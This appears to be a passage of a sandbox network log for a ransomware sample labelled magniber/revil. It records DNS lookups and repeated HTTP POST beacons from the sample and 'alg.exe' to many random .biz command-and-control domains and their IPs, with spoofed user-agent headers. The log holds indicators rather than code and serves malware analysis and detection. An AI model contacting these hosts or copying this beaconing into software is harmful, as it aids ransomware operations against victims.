HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=12bc0d5b6b9137e839fa9ddaa976fc5b|191.101.209.39|1719160430|1719160430|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

typgfhb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

typgfhb.biz

IN A

Response

typgfhb.biz

IN A

13.251.16.150
POST

http://typgfhb.biz/uucur

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /uucur HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=af7da94e1cf2f07892fca0a7c741e077|191.101.209.39|1719160430|1719160430|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

typgfhb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

typgfhb.biz

IN A

Response

typgfhb.biz

IN A

13.251.16.150
POST

http://typgfhb.biz/s

alg.exe

Remote address:

13.251.16.150:80

Request

POST /s HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=90963ea5122cd029c64066a289eba9f2|191.101.209.39|1719160431|1719160431|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

esuzf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

esuzf.biz

IN A

Response

esuzf.biz

IN A

34.211.97.45
POST

http://esuzf.biz/wlhw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /wlhw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5aa0d005fd7c2ea211d56b83ee2ce6fb|191.101.209.39|1719160431|1719160431|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gvijgjwkh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gvijgjwkh.biz

IN A

Response

gvijgjwkh.biz

IN A

3.94.10.34
POST

http://gvijgjwkh.biz/al

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

3.94.10.34:80

Request

POST /al HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f28a8ef0d0907396276a56ef8c20e5d5|191.101.209.39|1719160431|1719160431|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

esuzf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

esuzf.biz

IN A

Response

esuzf.biz

IN A

34.211.97.45
POST

http://esuzf.biz/oiiaqnphi

alg.exe

Remote address:

34.211.97.45:80

Request

POST /oiiaqnphi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ed0105b1894b8a2039502f91f7e0243e|191.101.209.39|1719160431|1719160431|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qpnczch.biz

alg.exe

Remote address:

8.8.8.8:53

Request

qpnczch.biz

IN A

Response

qpnczch.biz

IN A

44.213.104.86
POST

http://qpnczch.biz/bg

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.213.104.86:80

Request

POST /bg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=821a1bb5b1da353233577b6100e8bccb|191.101.209.39|1719160431|1719160431|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

brsua.biz

alg.exe

Remote address:

8.8.8.8:53

Request

brsua.biz

IN A

Response

brsua.biz

IN A

3.254.94.185
POST

http://brsua.biz/rslxnvajajvbs

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

3.254.94.185:80

Request

POST /rslxnvajajvbs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cd92536f27e44fd9e2d7102845899128|191.101.209.39|1719160432|1719160432|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gvijgjwkh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gvijgjwkh.biz

IN A

Response

gvijgjwkh.biz

IN A

3.94.10.34
POST

http://gvijgjwkh.biz/bxspjswoyd

alg.exe

Remote address:

3.94.10.34:80

Request

POST /bxspjswoyd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ef30e78a722d581b3f09364943a7a31f|191.101.209.39|1719160432|1719160432|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dlynankz.biz

alg.exe

Remote address:

8.8.8.8:53

Request

dlynankz.biz

IN A

Response

dlynankz.biz

IN A

85.214.228.140
POST

http://dlynankz.biz/sncufccolsidh

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

85.214.228.140:80

Request

POST /sncufccolsidh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.27.0
Date: Sun, 23 Jun 2024 16:33:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
DNS

qpnczch.biz

alg.exe

Remote address:

8.8.8.8:53

Request

qpnczch.biz

IN A

Response

qpnczch.biz

IN A

44.213.104.86
DNS

oflybfv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

oflybfv.biz

IN A

Response

oflybfv.biz

IN A

47.129.31.212
POST

http://qpnczch.biz/rlfsql

alg.exe

Remote address:

44.213.104.86:80

Request

POST /rlfsql HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1831c5717b47dc7d91f2f5cc3868f163|191.101.209.39|1719160432|1719160432|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://oflybfv.biz/rlfsql

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

47.129.31.212:80

Request

POST /rlfsql HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=02d8679bc0098d7026f97b9a10d0d9f3|191.101.209.39|1719160433|1719160433|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

brsua.biz

alg.exe

Remote address:

8.8.8.8:53

Request

brsua.biz

IN A

Response

brsua.biz

IN A

3.254.94.185
POST

http://brsua.biz/eyxlrkwl

alg.exe

Remote address:

3.254.94.185:80

Request

POST /eyxlrkwl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5303259174ba88960292d5086d6d2939|191.101.209.39|1719160432|1719160432|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dlynankz.biz

alg.exe

Remote address:

8.8.8.8:53

Request

dlynankz.biz

IN A

Response

dlynankz.biz

IN A

85.214.228.140
POST

http://dlynankz.biz/ptqfykioy

alg.exe

Remote address:

85.214.228.140:80

Request

POST /ptqfykioy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 404 Not Found

Server: nginx/1.27.0
Date: Sun, 23 Jun 2024 16:33:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
DNS

oflybfv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

oflybfv.biz

IN A

Response

oflybfv.biz

IN A

47.129.31.212
POST

http://oflybfv.biz/yaqdchf

alg.exe

Remote address:

47.129.31.212:80

Request

POST /yaqdchf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f7d91b5837930cc05a7d60d8390717aa|191.101.209.39|1719160433|1719160433|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yhqqc.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yhqqc.biz

IN A

Response

yhqqc.biz

IN A

34.211.97.45
POST

http://yhqqc.biz/uydyoxmvdlhxfw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /uydyoxmvdlhxfw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0034bd789a1c95b28e2c7e7ce9fb91bc|191.101.209.39|1719160433|1719160433|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mnjmhp.biz

alg.exe

Remote address:

8.8.8.8:53

Request

mnjmhp.biz

IN A

Response

mnjmhp.biz

IN A

47.129.31.212
POST

http://mnjmhp.biz/qyjvwwttjkt

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

47.129.31.212:80

Request

POST /qyjvwwttjkt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a135d78e03a01e87acf52e620b5306ec|191.101.209.39|1719160434|1719160434|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yhqqc.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yhqqc.biz

IN A

Response

yhqqc.biz

IN A

34.211.97.45
POST

http://yhqqc.biz/qnngjbqoruufm

alg.exe

Remote address:

34.211.97.45:80

Request

POST /qnngjbqoruufm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=09a99154efa79fa568ee6e0ffc11e9b7|191.101.209.39|1719160434|1719160434|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mnjmhp.biz

alg.exe

Remote address:

8.8.8.8:53

Request

mnjmhp.biz

IN A

Response

mnjmhp.biz

IN A

47.129.31.212
POST

http://mnjmhp.biz/lvscssxmxtg

alg.exe

Remote address:

47.129.31.212:80

Request

POST /lvscssxmxtg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cf0b4545f51a575cfcb879a8d799b956|191.101.209.39|1719160435|1719160435|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

opowhhece.biz

alg.exe

Remote address:

8.8.8.8:53

Request

opowhhece.biz

IN A

Response

opowhhece.biz

IN A

18.208.156.248
POST

http://opowhhece.biz/jxkqcwivcbpbeux

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /jxkqcwivcbpbeux HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1ca842c96b02d6ad3cc0794f16872f74|191.101.209.39|1719160435|1719160435|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zjbpaao.biz

alg.exe

Remote address:

8.8.8.8:53

Request

zjbpaao.biz

IN A

Response
DNS

jdhhbs.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jdhhbs.biz

IN A

Response

jdhhbs.biz

IN A

13.251.16.150
POST

http://jdhhbs.biz/fbsc

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /fbsc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=07522d3242df24138c74961fdff47a1c|191.101.209.39|1719160436|1719160436|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

opowhhece.biz

alg.exe

Remote address:

8.8.8.8:53

Request

opowhhece.biz

IN A

Response

opowhhece.biz

IN A

18.208.156.248
POST

http://opowhhece.biz/w

alg.exe

Remote address:

18.208.156.248:80

Request

POST /w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ace736c9b17df9f8bdf693d983f95426|191.101.209.39|1719160436|1719160436|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zjbpaao.biz

alg.exe

Remote address:

8.8.8.8:53

Request

zjbpaao.biz

IN A

Response
DNS

jdhhbs.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jdhhbs.biz

IN A

Response

jdhhbs.biz

IN A

13.251.16.150
POST

http://jdhhbs.biz/j

alg.exe

Remote address:

13.251.16.150:80

Request

POST /j HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=65df5c160f61393323e5cd7513dd9318|191.101.209.39|1719160437|1719160437|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mgmsclkyu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

mgmsclkyu.biz

IN A

Response

mgmsclkyu.biz

IN A

34.246.200.160
POST

http://mgmsclkyu.biz/rauxoqos

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.246.200.160:80

Request

POST /rauxoqos HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=848151465f9953aa136fac1f97e40711|191.101.209.39|1719160436|1719160436|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

warkcdu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

warkcdu.biz

IN A

Response

warkcdu.biz

IN A

18.141.10.107
POST

http://warkcdu.biz/rclmhpqx

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /rclmhpqx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=808fd67e16a3b001f95b18cd0b70cd9d|191.101.209.39|1719160437|1719160437|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mgmsclkyu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

mgmsclkyu.biz

IN A

Response

mgmsclkyu.biz

IN A

34.246.200.160
POST

http://mgmsclkyu.biz/vcev

alg.exe

Remote address:

34.246.200.160:80

Request

POST /vcev HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
